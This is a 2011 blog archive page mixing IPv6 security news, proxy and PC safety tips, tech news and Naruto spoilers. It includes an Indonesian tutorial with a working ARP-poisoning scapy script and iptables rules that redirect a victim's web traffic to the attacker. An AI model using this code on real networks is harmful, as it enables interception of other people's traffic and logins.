Pages

Sunday, March 27, 2011

Invisible IPv6 Traffic Poses Serious Network Threat


Experts say that most U.S. organizations have hidden IPv6 traffic running across their networks, and that few network managers are equipped to see, manage or block it. Increasingly, this rogue IPv6 traffic includes attacks such as botnet command and controls.
"If you aren't monitoring your network for IPv6 traffic, the IPv6 pathway can be used as an avenue of attack," says Tim LeMaster, director of systems engineering for Juniper's federal group. "What network managers don't understand is that they can have a user running IPv6 on a host and someone could be sending malicious traffic to that host without them knowing it."
Most U.S. network managers are blind to rogue IPv6 traffic because they don't have IPv6-aware firewalls, intrusion detection systems or network management tools. Also, IPv6 traffic is being tunneled over IPv4 connections and appears to be regular IPv4 packets unless an organization has deployed security mechanisms that can inspect tunneled traffic. (See also: 5 of the biggest IPv6-based threats facing CIOs.)
"At least half of U.S. CIOs have IPv6 on their networks that they don't know about, but the hackers do," says Yanick Pouffary, technology director for the North American IPv6 Task Force and an HP Distinguished Technologist. "You can't ignore IPv6. You need to take the minimum steps to secure your perimeter. You need firewalls that understand IPv4 and IPv6. You need network management tools that understand IPv4 and IPv6."
Saving Rachel (A Donovan Creed Crime Novel)
"Although they're not thinking about IPv6, for most of the Fortune 500, it's in their networks anyways," agrees Dave West, director of systems engineering for Cisco's public sector group. "You may not see IPv6 today as a business driver. But like it or not, you are running IPv6 in your network."
IPv6 is the long-anticipated upgrade to the Internet's main communications protocol, known as IPv4. IPv6 features vastly more address space, built-in security and enhanced support for streaming media and peer-to-peer applications. Available for a decade, IPv6 has been slow to catch on in the United States. Now that unallocated IPv4 addresses are expected to run out in 2011, the pressure is on U.S. carriers and corporations to deploy IPv6 in the next few years.
Kindle Wireless Reading Device, Wi-Fi, Graphite, 6" Display with New E Ink Pearl Technology
IPv6-based threats are not well understood, but they are becoming more prominent. For example, the issue of IPv6-based attacks was raised at a June meeting of the National Security Telecommunications Advisory Committee, a high-level industry group that advises the White House about cybersecurity.

Windows Security Checklist - Part 6: Invisible Internet Browsing or Talk to the Proxy


by Larry Stevenson, aka Prince_Serendip
First published at CastleCops: January 2, 2005
Revised and Updated: June 20, 2010

No one application nor technique can protect you at 100%, but you can still get pretty close to that. When these guidelines are followed by Windows users, it can bring their chances of being infected by malware almost to zero. Now we begin our next installment of the Windows Security Checklist, Part 6: Invisible Internet Browsing or Talk to the Proxy


It is not as complicated as it may first appear, although there can be a lot of information to absorb. The Security Experts, Malware Removal Specialists, Hardware Experts and MVPs at SpywareHammer can help you if you have questions about any of these techniques.

Invisible Internet Browsing

Each computer on the Internet is marked with its own special IP-address. (IP stands for Internet Protocol.) For cable users you probably have one or two static addresses that rarely change. For High Speed-DSL and Dialup users, you may have dynamic ones which change with each logon or fairly often. On high speed-DSL you can usually change your assigned IP address by turning your modem off, waiting 30 seconds and turning it back on, then reconnecting to your ISP's network. Dynamic IP's can be traced using Reverse-DNS where the network or ISP you are on allows for it. Each Reverse-DNS address is unique. Even if your dynamic IP-address changes, the Reverse-DNS address will remain the same.

Your IP-address allows your ISP and other computers to communicate with your PC. To be completely without an IP-address would be the same as a telephone without a dialtone. There would be no communication, and you would be offline. However, there are ways to mask or encrypt your IP-address.

Proxies are simply servers that connect users to a network. Usually it connects to another network (for example, the Internet) from a local network such as a business or even an ISP (Internet Service Provider). It allows many to access a network with one or several addresses. These servers can be very useful, contributing security, speed and privacy to those who wish to truly enjoy the Internet without giving up their identities.

There's basically three kinds of anonymous proxy services of interest to home users. Public Anonymous Proxy Listings which you can use by selecting, then inserting their addresses and port numbers into your web browser. You can find instructions for doing that with most popular browsers here: Using Proxies. Btw, their instuctions for Internet Explorer 6, apply to 7 and 8 as well. That article also explains about transparent, anonymous, distorting, and high anonymity proxies. Note: Try to avoid using proxy toolbar browser addons as many of these include tracking spyware, rather counterproductive to privacy.

By using an anonymous (http) proxy server, you are using their IP instead of your's to access the Internet. An anonymous proxy removes, masks or encrypts your IP on any requests you make when it passes these along to Internet websites. They talk to the proxy, not to you. For these proxies to be truly effective it is important to disable Java, Javascript and third-party cookies in your browser. If this detracts from your enjoyment then leave them on. Be aware though, that by doing so it is riskier. Additional risks also exist for these types of proxy servers, most especially from unencrypted traffic containing logins and passwords. If the anonymous public proxy you're using belongs to a malicious owner, you could be in trouble. You could likely encounter that kind of thing when using random choices from anonymous proxies lists without checking them to see if they're okay. You can look up IP addresses and whois at a site such as What Is My IP. You can find more such sites by searching for whois in your favorite search engine. Btw, Google is never anonymous. I use Scroogle all the time. Donations to Scroogle help us all, so be generous. As a general rule I stay away from anonymous proxies located in Eastern Europe, Russia, anywhere in Asia, Africa and South America.

Tip ...especially for dialup users: Large downloads can be agonizingly slow on dialup. By connecting to a web proxy server you can speed up the download by having the proxy get the files first, and then give them to you at their speed. You may have to test and expirement to find a server that can do that. You can also search for Premium Link Generator Sites. They have features where you can download large files from file sharing sites. You download the file to their server, then you get it from them. Be careful though, as there are some link/sync sites which offer browser addons that are spyware.

For large downloads, I would strongly advise that you get a Download Manager--even if you're on a high speed connection. These types of programs can resume downloads that have stopped without warning or become broken somehow. They can greatly speed up the download by simultaneously splitting the file into smaller segments and downloading them all at once. My favorite one is Free Download Manager.
Another kind of anonymous proxy server is accessed via a web page service. There's no need to program your browser. Simply open the web page and insert the URLs/addresses you wish to visit in their search bar. IPHider is one such service, and it's entirely free.

The third way is by means of a VPN, a Virtual Private Network. A few of these are free, but most are subscription based. Please refer to this article: 8 Free VPN Services.

Warning (Tip)...do not try to join security forum boards using an anonymous proxy. You could be banned. They don't trust members who are not forthcoming.

Besides using anonymous proxy servers on the web, you can use a free program that does even more. Proxomitron is shown below.

Proxomitron has these features:

Stop windows that pop-up, pop-under, or pop-over
Stop those un-closable endless banner chains
Stop pop-up JavaScript message boxes
Remove web-branding and other scripts tacked on by "free" web providers.
Convert most ads and banner pictures into simple text links
Freeze all animated gifs
Make blinking text appear as bold instead
Remove slow web counters
Stop web pages from "auto-refreshing"
Prevent pages from changing fonts
Get rid of or replace web page background images
Protect against getting "trapped" inside someone else's frames!
Make all frames resizable
Close top or bottom frame banner windows
Make background MIDI songs play only when you choose.
Remove status bar scroll-texts
Remove "dynamic" HTML from pages
Disguise your browser's identity and version from JavaScripts
Remove style sheets
Un-hide URLs when the mouse is over a link
Disable frames or tables altogether
Change or delete cookies
Change your browser's user-agent and other identifying fields
Hide where you've been previously from inquisitive web servers
For more information please refer to: The Proxomitron - Universal Web Filter

This article is meant to be a general introduction to the use of anonymous proxies, and not a detailed dissertation on the subject. Thanks for reading.

Best regards and always take care of your security!

Thursday, March 24, 2011

12 Tips to Make your PC Healthy

  1. Get a reliable Internet Connection with good speed
  2. Install an Internet Security Suite which consists of Antivirus, Anti-Spyware, Anti-Spam, Firewall, Pop-up-Blocker and Privacy Control. Be sure to try the software before you buy, because some software may slowdown your PC.
  3. Remove the Temporary Files, Folders, Internet Cache, Cookies once you finish surfing.  For this you can enable the automatic cleanup option available in the browser settings.
  4. Install the Windows updates, whenever prompted by your computer, because updates provide some advanced features, and security patches to protect the computer from vulnerabilities. If you haven�t enabled the automatic windows updates, enable it now!  Kindle Wireless Reading Device, Wi-Fi, Graphite, 6" Display with New E Ink Pearl Technology
  5. Remove unnecessary/unused softwares that have been installed in your computer, because too much of unused software can also affect the system performance.
  6. Always scan the external devices (USB Drive, CD�s, DVD�s, external hard disc) with your antivirus software before you access the folders/files.
  7. When you download free wares, be sure that you download it from genuine sites like download.com as this download site tests spyware or virus free, after which they accept the download link from developers.
  8. Take regular secure back-up of your data
  9. Have a RAM, which suits your computer hard disc and also learn how to restore you computer.
  10. Disable unnecessary services that are running in your computer.
  11. Know to differentiate unsolicited spam/hoax emails and genuine emails
  12. Be sure to check for SSL (Secure Sockets Layer) encrypted certificate when you visit banking related websites.  i.e. check if the site starts with https:// before you provide personal confidential financial information . This will prevent loss of information and unnecessary adware�s getting installed in your computer. Kindle Wireless Reading Device, Wi-Fi, Graphite, 6" Display with New E Ink Pearl TechnologyAlice At Heart

Google Open Sources MapReduce compression

Google has pen sourced the compression library used across its backen infrastructure including MapReduce, its distributed number-crunching platform, and Big Table, its distributed database.

Aviable at Google Code under an Apache 2.0 license, the library is called Snappy, but Google says this is same library that was previously referred to as Zippy in some public presentations. as the names imply, the library's primary aim is speed. "It does not aim for maximum compression, or compatibility with any other compression library,"Google says. "Instead, it aims for very high speeds and reasonable compression."


Compared to the fastest mode of the popular zlib compression library, Google says, the C++-based Snappy is an order of magnitude faster in most cases (roughly ten times faster), but the compressed files are between 20 and 100 per cent larger. Running in 64-bit mode on a single core of a 2.26Ghz "Westmere" Intel Core i7 processor, according to the company, Snappy compresses at roughly 250MB/sec and decompresses at 500MB/sec.

Google says that the typical compression ratios are about 1.5x to 1.7x for plain text and about 2x to 4x for HTML. zlib in its fastest mode gives you 2.6x to 2.8x for plain text and 3x to 7x for HTML. " So if you want to save space, or want to compress once and decompress lots of times, use zlib (or bzip2, or�). But if you just want to cut down on your I/O, be it network or disk I/O, Snappy might be for you," says Google engineer Steinar Gunderson.

According to Gunderson, Snappy removes the "entropy reduction" step that characterizes zlib and other LZ-style compression libraries. "Most LZ-style compressors (including zlib) consist of two parts: A matching algorithm (recognizing repetitions from data earlier in the stream, as well as things like 'abcabcabcabc') and then an entropy reduction step (almost invariably Huffman or some version of arithmetic encoding)," he says. "Snappy skips the entropy reduction and instead uses a fixed, hand-tuned packing format."

This format, Gunderson says, affords "much less" CPU usage, and he says that Google has spent years fine tuning it. Virtually all of Google's online service run atop a uniform distributed infrastructure based on the proprietary Google File System (GFS), MapReduce, BigTable, and other platforms. This have been mimicked in the open source world by the Apache Hadoop project.

Source : http://www.theregister.co.uk

Microsoft's Novell patent pals return to SuSE's homeland

The Microsoft-led consortium of tech companies trying to hoover up nearly 1,000 of Novell's patents is back in business.
CPTN Holdings re-registered with German authorities on Wednesday, according to the website of the German Federal Cartel Office. Plans to create CPTN as a German entity were withdrawn in December 2010.
CPTN is buying 882 of Novell's patents in a deal with soon-to-be Novell-owner Attachmate. Apple, EMC, and Oracle are also members of CPTN, but it's helmed by Redmond.

The re-registration of CPTN in the homeland of Novell's SuSE Linux was picked up by patents watcher Florian Mueller, who also noticed Novell's stock price is up 2.8 per cent in the US. "Looks like a strong clearance rumor or some other very signficant news," he Tweeted Thursday.
It certainly can't be Novell's financial position that's driving up the stock price. The Attachmate deal is helping to stall sales, with Novell recently reporting a $17.9m loss for its fiscal first quarter, compared to a profit of $20.2m a year ago.
Could Novell's sale to Attachmate and related sale patents to CPTN be closing? When CPTN withdrew from Germany last year, Microsoft called the move a "purely procedural step necessary to provide time to allow for review of the proposed transaction."
The group actually stopped operations the day before OSI president Michael Tiemann lodged an official complaint with the Federal Cartel Office, asking regulators to investigate the sale of the patents.
CPTN registered in US on November 11, 2010, and it has apparently continued operation throughout.
Officially at least, both Attachmate's acquisition and the CPTN deal are on hold in the US until April 12 while the Department of Justice reviews them.


Source : http://www.channelregister.co.uk

Wednesday, March 23, 2011

./GNOME Terminal (search on google)

google hack ini di tulis oleh TualatriX (pengembang ubuntu tweak)
dengan menambahkan fasilitas google search pada terminal...:)
so jika terjadi error saat bekerja di terminal maka anda tidak perlu mengcopy error tersebut
kemudian mem pastenya di google search...
yang perlu anda lakukan hanyalah mem-block error tersebut & klik kanan sajha...:D

langsung sajha..:D

jika anda sudah meng-install ubuntu tweak maka akan sangat mudah untuk melakukan installasinya..
karena sudah include di dalam ubuntu tweak..
lihat gambar...:)

nach alternativ lainnya, anda bisa melakukan installasi dengan menambahkan PPA (ubuntu 10.4 & 10.10)

sudo add-apt-repository ppa:tualatrix/gnome-terminal
sudo apt-get update
sudo apt-get upgrade

& liad hasilnya....:)
source code : https://code.launchpad.net/~tualatrix/ibentu/gnome-terminal
selamat mencoba.....:p

gooo....open source...:)

./DNS spoofing with scapy

bissmillah...
=============================================
Malang Cyber Crew | indonesian cyber security
=============================================
title    : DNS spoofing with scapy
auth0r   : yur4kh4
blog     : http://www.devirakhjib.uni.cc/
mail     : yur4kh4[at]yahoo[dot[com]
date     : 23-03-2011
Language : Indonesian



[*]pembuka
    tulisan ini di buat semata-mata untuk pelajaran saja, tidak ada maksud untuk merusak & meningkatkan traffic cyber crime di indonesia.
    penulis sangat berharap bahwa masyarakat indonesia bisa lebih meningkatkan security di di bidang IT (khususnya bagi para pengelola)internet cafe
    & satu hal yang terpenting penulis sangat berharap masyarakat indonesia bisa beralih ke sistem operasi yang open source..hee...
   
[*] persiapan
    " pastikan sistem operasi anda linux
    " pastikan python scapy terinstall pada sistem operasi anda
   
    jika belum terinstall python scapy, anda bisa meng install nya lewat synaptic (dalam hal ini saya menggunakan ubuntu)
    jika sudah terinstall lanjut ke tahap selanjutnya.,

[*] konfigurasi

    yang pertama lakukan IP forwading
    echo 1 > /proc/sys/net/ipv4/ip_forward
   
    kemudian non aktivkan ICMP redirect
    echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects

    next IP tables setting
    Apa saja yang bisa dilakukan dengan iptables?
    Dengan kemampuan tools iptables ini, kita bisa membuat aturan (rule), untuk arus lalulintas data.
    silahkan googleing untuk penjelasan lebih mendalam.

iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat

iptables --append FORWARD --in-interface wlan0/eth0 --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0/eth0 --jump MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination 10.42.43.23
iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination 10.42.43.23

ini bash scriptnya..biar ga repot-repot mengetik di termilal..
   
--------------------------------------cut here--------------------------------------------------------
#########################################################
#              yur4kh4                #
#         Malang cyber crew            #
#            kill-9 crew                #
#        indonesiancoder team            #
#########################################################
#!/bin/sh
INTERFACE="wlan0" #cek interface dg mengetikan ifconfig di terminal
SERVERWEB='10.42.43.23' #ip ente

echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects

#clear rule..
iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat

iptables --append FORWARD --in-interface $INTERFACE --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump MASQUERADE

#rendirect traffic.. on my server/proxy
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination $SERVERWEB
iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination $SERVERWEB
--------------------------------------cut here--------------------------------------------------------
save dengan nama: terserah.sh

selanjutnya
save script python-scapy ini dengan nama : ihir.py
--------------------------------------cut here--------------------------------------------------------
from scapy.all import *;
from time import sleep;
conf.iface='wlan0';#network card

target="10.42.43.1";#target /victim

router="10.42.43.1";#routernya

packet = ARP(); #bikin packet :P

packet.psrc = router # Gateway

packet.pdst = target # victim v.v

try:
    while 1:
        send(packet, verbose=0);
        sleep(50);
except:
    pass
--------------------------------------cut here--------------------------------------------------------

nach yg perlu anda lakukan adalah menyesuaikan

INTERFACE="wlan0" #cek interface dg mengetikan ifconfig di terminal
SERVERWEB='10.42.43.23' #ip ente

network card yang terkoneksi dengan internet serta ip local anda
&
target="10.42.43.19";#target /victim

router="10.42.43.1";#routernya

kalau ingin semua permintaan packet client berpindah ke web server anda
target="10.42.43.19/24";#target /victim

dengan begitu semua IP local client akan di alihkan ke IP local anda...:D

[*] eksekusi

root@dEviRakhjib:/home/yur4kh4# ./terserah.sh
root@dEviRakhjib:/home/yur4kh4# python ihir.py

yupzz.,..tunggu beberapa saat
semua permintaan packet akan di kirimkan / di alihkan ke IP anda...:D

greettzz.....:D

[*] penutup
    dengan di jalankannya ihir.py maka berakhir pula tulisan yang sangat sederhana ini..
    semoga sajha mudah untuk di mengerti..namun jika masih di anggap susah untuk di mengerti
    silahkan hubungi saya..^_^
    YM : yur4kh4
        ..Jangan berkata TIDAK, karena semua itu BELUM ..
+++++++++++++++++++thankz t0++++++++++++++++++++++++
[&] allah, muhammad, & seluruh pengikutnya...
[!] Malang Cyber Crew - kill-9 - Indonesian coder
[%] Arianom, Tukulesto , n4ck0 , marahmerah , kamtiez , vYc0d , xr0b0t
    contrex , mboys , Pathloader , t3ll0 , Thunder x c0de, jundab
    ibl13z , geni212 , dhomas , kalong666 ,ichal ,jos_ali_joe, mugna
        &&**akulukasaatkaupergi**&&
+++++++++++++++++++Luv der4+++++++++++++++++++++++++
mirror : http://packetstormsecurity.org/files/view/99642/dnsspoof-scapy.txt

./merubah halaman login facebook (chrome extension)




langsung install sajha gan 

https://chrome.google.com/extensions/detail/bdlfdaajmclngiomogmleihllaejcnni

untuk merubah background
paste ==>>> chrome://extensions/   | di address bar chrome ente
cari "Facebook Refresh" extension & klik "Options" link.
paste link gambar yang ente inginkan.,.:D
beres mas br0.,.liad halaman index facebook anda..;)

Thursday, March 17, 2011

Can you trust the privacy policy provided in Websites?

Recently, this question came into my mind, when I happen to receive certain survey mailers, and if I fill in the survey, I would be receiving a gift. But I had a doubt whether to participate in the survey or not. Then I made up my mind and participated in the survey, after reading the privacy policy which mentioned "Your details, such as name, email address, phone number, address or date of birth etc etc won't be shared with any third party." And then I just accepted the terms and conditions keeping in mind why does it require for a survey to get all my personal details, still I proceeded with the survey filling in my details as required.

After a few days I received 4 or 5 calls from different locations and phone number stating I have filled in a coupon in super market and have won a gift. To get the gift I need to come to particular location and attend a presentation. When I enquired, they said its regarding a MLM Business. Later I realized my information was shared / sold to some third party companies, who are trying to market their products.
This is no big surprise to me, because I know well that leading mobile companies, sell our data for a good cost/value to the marketing agencies and companies, who frequently use to call and SMS (Text Message) us in a regular basis to sell some product or service. In countries like india, though we opt out for a DND / DNC (Do Not Disturb / Do Not Call) we receive even more calls as the rules are strictly not followed, or before we opted itself or either the data is already with third parties. That goes one side, but on the other hand, they online survey mailers and website, they too have started getting our data from us for their business and for the growth of other business ;)

Between, you can trust some corporate companies, who ask for subscribing to newsletters if you unsubscribe and even you can provide confidential details if you are purchasing a product or opting for service. They tend to use these details only to remind you if the service/product is going to expire or update you some special offer if required. But this also if you wish they will provide, if you don�t they won�t. So your data is in safe hands. If you happen to register with some miscellaneous website, probably your data is No-More Safe. THINK & ACT.
After making this analysis, probably I will have to change my mobile number - so that I don't get irritated / frustrated with dump calls. :)
Don't forget to look in to this link - a guy frustrated with kotak mahindra bank marketing call, has shared the real experience.

Read Naruto 532 Online - Page 1

Our Prayers for All the Tsunami Victims of Japan
____________________________________________________________
Naruto 532 (English)

CLICK Images to Read Online













Hi Guys, Zetsu-san here, just to let you know about this
Naruto Shippuden Movie 4
I would recommend watching if you already haven't done so
(we finally get to see Yondaime in action!)
____________________________________________________________
Read This!! Another SPOOF From Numinous
CLICK Images to read Full Abridged Version
Naruto Chapter 60 Abridge Version

-----------------------------------------------------
Naruto Chapter 12 Abridged Version

Please Also Read
Fan Art Prediction by: Hatifnatten
CLICK Image to Read
Full FanFic Manga

Kakashi 's Face Revealed!!
Click Image to Read Full Manga


CLICK Images to Read Full Fan-Fic

Sasu-Saku and Naru-Hina


____________________________________________________________
Naruto 532, Naruto 532 Raw, Naruto 532 Confirmed Spoiler, Naruto Manga 532, Naruto 532 English, Naruto 532 Read Online, Naruto 532 OneManga, Naruto 532 Narutocentral, Naruto 532 Narutofan, Naruto 532 Mangahelpers, Naruto 532 Raw Spoilers, Naruto 532 Spoilers, Naruto 532 Predictions, Naruto 532 Download, Naruto 532 Predictions, Naruto 532 Raw Pics, Naruto 532 Raw Scans, Naruto 532 Ohana, Naruto 532 Nja, Naruto 532 Mangastream

Wednesday, March 16, 2011

Temu Teman Malang Cyber crew

bismillah...
alhamdullilah..
masih di beri nafas sampai hari ini..hee...
okey.,langsung sajha, kali ini kami dari malang cyber insya allah akan melaksanakan
workshop / lebih tepatnya bagaimana kalau kita sebut sajha dengan temu teman :)
acara yang akan dilaksanakan pada hari minggu tanggal 20 maret ini murni hasil kerja
dari anggota kami sendiri..:)
dengan dana yang seadanya & hasil iuran dari anggota..kami bisa menyusun acara temu teman
yang baru pertama kali kami laksanakan ini..harapannya semoga saja dengan adanya kegitan ini
bisa membangkitkan serta meningkatkan kreativitas & semangat untuk belajar bersama di bidang IT
tidak ada batasan untuk peserta yang ingin mengikuti kegitan ini.
artinya..siapa saja boleh ikut...tanpa di pungut biaya..pendaftaran..:)
adapun beberapa materi yang akan kami bahas dalam acara ini sebagai berikut :
1. root & jump server
mungkin bagi sebagian orang kata root & jump sangat asing di telinga
tapi bagi sebagian orang lagi..root & jump adalah hal biasa.apalagi bagi pengguna linux
istilah root sangat tidak asing lagi di telinga mereka..hee...akan kita bahas lebih mendalam nantinya

2. multi tabnabbing attack (metasploit)
hhhhmmm.,.istilah ini memang mungkin masih sangat membingungkan apa maksudnya...:D , dengan memanfaatkan
kelemahan DNS (domain name server),.kita bisa melakukan tekhnik serangan ini..di bantu dengan sebuah tools
yang sangat mudah untuk di gunakan..:). akan kita bahas lebih mendalam juga nantinya . :p

3. sharing seputar IT
diskusi-diskusi biasa../ silaturahmi sambil membicarakan perkembangan & kelemahan IT yang ada di
indonesia khususnya yang ada di kota malang..siapa saja boleh bicara tentunya..
menurut pandangannya masing-masing..harapannya dari hasil diskusi ini ada follow up nantinya untuk
terus meningkatkan perkembangan IT indonesia..AMIN.

4. why linux is better>??
jelas kita akan membahas secara tuntas mengapa operating system yang satu ini
kita pandang lebih unggul dari OS-OS yang lainnya...:). bahasan ini yang terpenting menurut kami.

nach...selanjutnya bisa kita sesuaikan dengan kebutuhan saat acara nanti..
semoga apa yang kami lakukan ini mendapat respon yang baik dari teman-teman semua..AMIN...
semoga apa yang kami lakukan ini menjadi berkah nantinya..AMIN..
dan tentunya semoga bermanfaat..AMIN..

NB : untuk teman-teman yang di luar kota malang tidak dilarang untuk hadir & mengikuti acara ini.
tapi karena keterbatasan biaya & sebagainya..
kami dari pihak malang cyber tidak bisa memberikan biaya transportasi untuk temand-temand :(
cP :
YM : yur4kh4
        bgs_ayie2000
        nakula_h3r3

jangan berkata TIDAK, karena semua itu BELUM.


Saturday, March 12, 2011

Naruto 532 Raw, Spoilers and Predictions

Our Prayers for All the Tsunami Victims of Japan
____________________________________________________________
Naruto 532 (English)

CLICK Images to Read Online











____________________________________________________________
Status: CONFIRMED SPOILER
Rough trans:
More flashbacks from Hanzou and Mifune's past fight.
Hanzou commits seppuku(?!)

Ino-Shika-Chou VS Asuma
Something about Chouji struggling to dodge his attacks and Shikamaru trying to think of a counterattack.
---------------------------
From Flipping through the chap

Flashback of the past fight of hanzo vs mifune
Hanzo commits hara-kiri(suicide)

Inoshikacho vs asma
Although Shikamaru seizes a chance and give choji an order to attack.
Choji can't.
Asma while saying "dodge it!" makes counter attack.
------------------------
532

Mifune Vs Hanzou, Final Round.

Mifune : You don't remember me, all right. But it seems you don't even remember our past fight.

Past

Mifune's sword is destroyed.
Hanzou slash him and Mifune bleed from his head.

Hanzou : This is the poison of the Salamander. Of course, my weapon is poisoned too.
Mifune : Ugh
Hanzou : I'll tell you why people call me "Hanzou of the Salamander". As a souvenir you will take with you to hell.
In my village there is a black salamander that can create mortal toxical poison.

Mifune : !?

Hanzou : I was a child When it died. I embedded his poison bag. It's right here. ( Left side of his stomach ) so I can be immune to his poison.
And I can poison my surrounding just by breathing.

As I child I was scared so I stopped breathing with my mouth to prevent poisoning my surrounding.

Mifune : So why didn't you remove your mask ?

Hanzou : Because there is a risk. My mask as another purpose. To prevent me from breathing my own poison.
Mifune : ?

Hanzou : Think about it, if someone slash my inner poison bag, the poison would exit my body and there is a possibility that I would breath it.
If I breath all the poison, it would override my poison resistance and I would be render unable to move, creathig an opening.
And I can't allow this to happen. So I can fight people like you.

Mifune : People and swords are alike. But now it's ... over for me. Profound Sadness !

Hanzou : Let me tell you something. Do you know when people die ?
Mifune : ?

Hanzou : When they lose their beliefs.

That's why you were a pain. People judge from outward apparence. You may be defeated but
that's not because you were too soft.

That's because you were afraid of my name. Because you swore to prtect your friends. Thoses friends you used as shields.

Mifune : *panting*

Hanzou : Now, hero, I will name you. Tell me when you die, Tell me your NAME !

Mifune : *breathing heavily*

Hanzou : Let me hear it !

Mifune : Don't ever lay a hand on my samurai comrades.

Hanzou : Here's a counter poison medecine.

Mifune : ?

Hanzou : They say you can't judge one's belief by looking at people. I realized during battle.
It's been a long time I saw someone like you. Today, I let you live. It's not like you were going to die immediatly after, though.

Hanzou uses counter poison medecine on Mifune.

Hanzou : From on now, will you die with your beliefs ? Or will you throw them and live ?

Back to present.
Mifune : I wanted to make sure but ... did you really threw you beliefs ?
Hanzou : You can't judge that by looking at me.
Mifune : !

Hanzou : I'm immortal all right, but there is a way to stop me. I already explained it to you Mifune.
Use the opening to seal me. If you don't do it, you will ...

Samurai : Master Mifune ! The poison is ...

Mifune : I'm ok. I have resistance against this poison. But from on now it will be different.
Everyone back off, with me. Prepare the seal.

Hanzou prepare to use his blade.

Mifune : Look around you.

Hanzou : Mifune, I entrust my beliefs to you. ( Hanzou stabs himself with his blade ).

Samurai : Seppuku ?

Hanzou : This poison is the real deal.
You can't breath this even if your have resistance against it, be careful.

Kabuto : My order fuuda tag is faiding. Suicide ? Then I just have to control all their moves myself one by one.

Hanzou shivers and crumbles.


Mifune : So you didn't threw you beliefs after all.


Multiple ninjas performs a seal on Hanzou.

Kabuto : What the ? The tag stopped working.

Mifune : "Hero" was the name you gave me. I was able to see your beliefs with my own eyes. Well done, Hanzou-dono.

-------------------------

Shikamaru : Stop being a slowpoke, Chouji. Pull yourself together.
Ino : He's coming !
Asuma : Shikamaru ! Use Shadow Mimic on Chouji to capture me !
Shikamaru : That's what I'm planning. ( Kage Mane no Jutsu ! )

Shikamaru manage to capture Asuma by using Chouji's shadow.

Shikamaru : Now, Chouji !

Asuma : (Perfect !)

Chouji uses Partial Multi-Expansion Jutsu on his hand and goes for Asuma's head but stops his gigantic
fist just before hitting Asuma's face.

Asuma : What the HELL are you doing Chouji ?

Shikamaru : Chouji ! Come on !

Ino : Chouji ...

Chouji : I can't. I just can't. I'm unable to knock down and hit Asuma. I can't do that.

Asuma : Chouji ! ( Asuma roundhouse kick and blow off chouji )

Asuma : DODGE ! Fuuton : Fuujin no Jutsu ( Wind Style : Dust Blast Technique )

-----------------

Over !
____________________________________________________________
Naruto 531 (English)

CLICK Images to Read Online


















Hi Guys, Zetsu-san here, just to let you know about this
Naruto Shippuden Movie 4
I would recommend watching if you already haven't done so
(we finally get to see Yondaime in action!)
____________________________________________________________
Read This!! Another SPOOF From Numinous
CLICK Images to read Full Abridged Version
Naruto Chapter 60 Abridge Version

-----------------------------------------------------
Naruto Chapter 12 Abridged Version

Please Also Read
Fan Art Prediction by: Hatifnatten
CLICK Image to Read
Full FanFic Manga

Kakashi 's Face Revealed!!
Click Image to Read Full Manga


CLICK Images to Read Full Fan-Fic

Sasu-Saku and Naru-Hina


____________________________________________________________
Naruto 532, Naruto 532 Raw, Naruto 532 Confirmed Spoiler, Naruto Manga 532, Naruto 532 English, Naruto 532 Read Online, Naruto 532 OneManga, Naruto 532 Narutocentral, Naruto 532 Narutofan, Naruto 532 Mangahelpers, Naruto 532 Raw Spoilers, Naruto 532 Spoilers, Naruto 532 Predictions, Naruto 532 Download, Naruto 532 Predictions, Naruto 532 Raw Pics, Naruto 532 Raw Scans, Naruto 532 Ohana, Naruto 532 Nja, Naruto 532 Mangastream